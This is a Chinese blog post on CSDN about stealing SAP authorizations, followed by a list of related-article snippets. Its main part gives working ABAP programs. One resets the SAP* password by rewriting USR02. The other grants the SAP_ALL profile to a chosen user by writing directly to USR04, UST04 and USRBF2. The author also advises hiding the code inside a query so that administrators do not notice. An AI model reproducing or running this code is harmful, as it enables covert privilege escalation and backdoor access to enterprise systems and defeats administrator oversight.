如何窃取权限

最新推荐文章于 2023-11-22 09:05:08 发布
最新推荐文章于 2023-11-22 09:05:08 发布
阅读量721 收藏
点赞数
文章标签: authorization sap report table query user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saptopia/article/details/1827876
版权

..............................
如何窃取权限

..............................

用户:
User type用户类型(干啥用的不讲):
通常的用户类型有
a.dialog (就是normal user)
b.communication
c.system
d.service
e.reference.

通常你在使用任何T-code前一定会有权限检测的.
AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.
**如果coding只要使用此函数就够了.
AUTHORITY_CHECK_TCODE:检查T-code

这倆函数是真正检查autorization objects的.
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
将SAP*的密码改成123的程序,很简单.
我们找到那个user logon表USR02.
(DF52478E6FF90EEB是经过SAP加密保存在DB的,哪位老兄研究过SAP的密码加密?)
report zmodSAP*.
data zUSR02 like USR02 .
select  single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02  .

 

现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个
query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭...

这样做太狠毒了.还是自己偷偷搞自己的用户吧.
在此你必须对权限结构非常清晰.
权限和三个表有关系.
a.USR04
b.USR04
c.USRBF2  这个表是对应到所用的authorzization objects的.
*&---------------------------------------------------------------------*
*& Report        : Steal SAP ALL Right                                 *
*& Creation Date : 2004.04.01                                          *
*& Created by    : Stone.Fu                                            *
*& Description   : 可窃取SAP ALL权限                                    *
*& Modified Date : 2005.11.02
*& Description   : 将此code hide在report painter or query  code        *
*&---------------------------------------------------------------------*

report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS  like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select  single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 权限
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS  = zPROFS.
Update USR04 from zUSR04  .

**Update User authorization masters table UST04 .
select  single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE  = 'SAP_ALL'. "SAP all 权限
Update UST04 from zUST04 .

*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .

select *  from  USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

 
saptopia
关注
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
基于权限组合的Android窃取隐私恶意应用检测方法
01-20
黄梅根与曾云科在“计算机应用与软件”第33卷第9期上发表的《基于权限组合的Android窃取隐私恶意应用检测方法》详细探讨了这一问题,并提出了一套检测恶意应用的方法。 首先,研究者分析了Android系统中总共165个...
SAP权限相关的表及如何使用FM获取用户权限
SAP ABAP开发技能记录分享
11-22 1163
AGR_1250 活动组的权限数据(通过权限对象 查 角色)FM:EFG_USER_AUTH_FOR_OBJ_GET 也可以得到指定用户指定权限对象的值。AGR_1253 作业组的权限数据 - 静态对象。使用FM获取用户指定的权限对象的值:SUSR_USER_AUTH_FOR_OBJ_GET。AGR_1251 活动组的权限数据。例:*&*****权限相关。
SAP 用户权限解析
少年休闲海
11-08 5493
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念. 1.activity 这样说吧,我们从activity谈起,activity是什么意思这个你查下 字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两, 不对,这是我老
ABAP-获取用户权限对象函数
qq_42489747的博客
06-22 139
1 DATA: gt_values TYPE STANDARD TABLE OF usvalues. 2 CALL FUNCTION 'SUSR_USER_AUTH_FOR_OBJ_GET' 3 EXPORTING 4 * NEW_BUFFERING = 3 5 * MANDANT = SY-MANDT 6 user_name...
获取权限对象相关函数
森林木的博客
08-06 1403
最近好几个人问获取权限相关的函数。 开始是找了个 根据操作账号,权限对象获取所属权限   CALL FUNCTION 'GET_AUTH_VALUES'     EXPORTING       object1           = iv_auth_obj       user              = iv_uname     TABLES       values            
函数组:SUSE
weixin_33851429的博客
10-24 96
函数组说明:外部使用的功能模块;这个函数组中的函数可以用来处理一些系统功能。 AUTHORITY_CHECK_TCODE(Authorization Check for Start of a Transaction):检查开始事务的权限。输入事务码,返回当前用户是否有事务码的执行权限。AUTH_CHECK_TCODE:作用与上面的事务码类似。OBJECT_EXISTS:检查权限对象是否存在PAS...
通过Android任务机制进行权限泄漏和信息窃取
02-25
在探讨Android操作系统中的安全漏洞时,本文将详细分析Android任务机制中的权限泄漏和信息窃取问题。Android平台以其在智能手机市场上的绝对主导地位,拥有82.8%的市场份额,随着智能手机在我们日常生活中扮演愈发...
基于权限组合的Android窃取隐私恶意应用检测方法.pdf
09-21
本文主要探讨的是在Android系统中如何检测窃取隐私的恶意应用,特别是在面对大量权限组合的情况下,提出了一种基于权限组合的检测方法。Android操作系统因为其开放性,吸引了众多开发者和用户,但也因此成为了恶意...
SAP 用户权限
ctf63282的博客
01-21 407
用户权限解剖:通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的prifile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?[@more@]首先明白几个概念.1.act...
致命SAP权限控制漏洞
myliulongtao的专栏
10-07 2555
尽管SAP系统提供了非常完善的权限控制机制,甚至允许细到字段级和允许用户自定义授权对象,然后SAP权限控制漏洞也是致命的,随便一个小程序就可轻易获取权限作为职业程序员,对取得权限大多会有一定兴趣(这点催生了一批无聊的所谓Hacker).读者可自行理解下面几个概,在此不再细述.[1].Activity(group)[2].Authorization Object[3].Profi
【ABAP系列】SAP ABAP常用函数总结第一篇
ARICK2014的博客
07-13 386
公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:【ABAP系列】SAP ABAP常用函数总结第一篇 前言部分 大家可以关注我的公众号,公众号里的排版更好,阅读更舒适。 正文部分 1:负号前置:CLOI_PUT_SIGN_IN_FRONT 2:加前导零:...
权限相关
wy的专栏
07-27 230
AUTHORITY
获取用户权限列表(RSSB_GET_AUTH_FOR_USER
twomeyla博客
08-13 1101
外部系统有时要用到BW系统内表设置的权限来做管控,目的当然是为了不用一样的信息在多个地方去维护。 之前都是采用直接到后台表去查询,写一个RFC去读,其实系统也有这个RFC:RSSB_GET_AUTH_FOR_USER。         有时觉得SAP做的太绝了,你想到的想不到了,都帮你做到了。
获取用户的授权值
huling_1997的博客
11-20 446
REPORT  z_barry_test. DATA: it_values TYPE TABLE OF usvalues WITH HEADER LINE. CALL FUNCTION 'SUSR_USER_AUTH_FOR_OBJ_GET'   EXPORTING     user_name           = 'TZ_SD002' *    sel_object     
SAP 的用户创建及权限设置
少年休闲海
07-17 6397
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name, 记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢? 首先明白几个概念. 1.activity 这样说吧,我们从activity谈起,activity是什么意思这个你查下 字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两, 不对,这是我
SAP用户权限控制大解析及权限进阶分析
少年休闲海
11-23 3090
通常basis会使用PFCG做权限管理,你保存时会产生一个系统外的profile name,而且,SU01时用户有profile 和role两栏位。   这些个profile name ,profile,role它们的关系如何呢?profile 这个英语词义是很丰富的,在中文中难找对应的表示同等语义的词语。   基本概念    activity   activity,活动,类如insert
NovelReader,“天下书阁”小说阅读器是一款基于Re.zip
最新发布
11-01
NovelReader,“天下书阁”小说阅读器是一款基于Re
基于恶意权限组合的Android隐私窃取应用检测方法
本文主要探讨了一种基于权限组合的Android窃取隐私恶意应用检测方法。在深入分析Android系统的165个权限基础上,作者提炼出30个理论上可以获取Android系统隐私资源的恶意权限组合。这些组合包括对用户个人信息、位置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值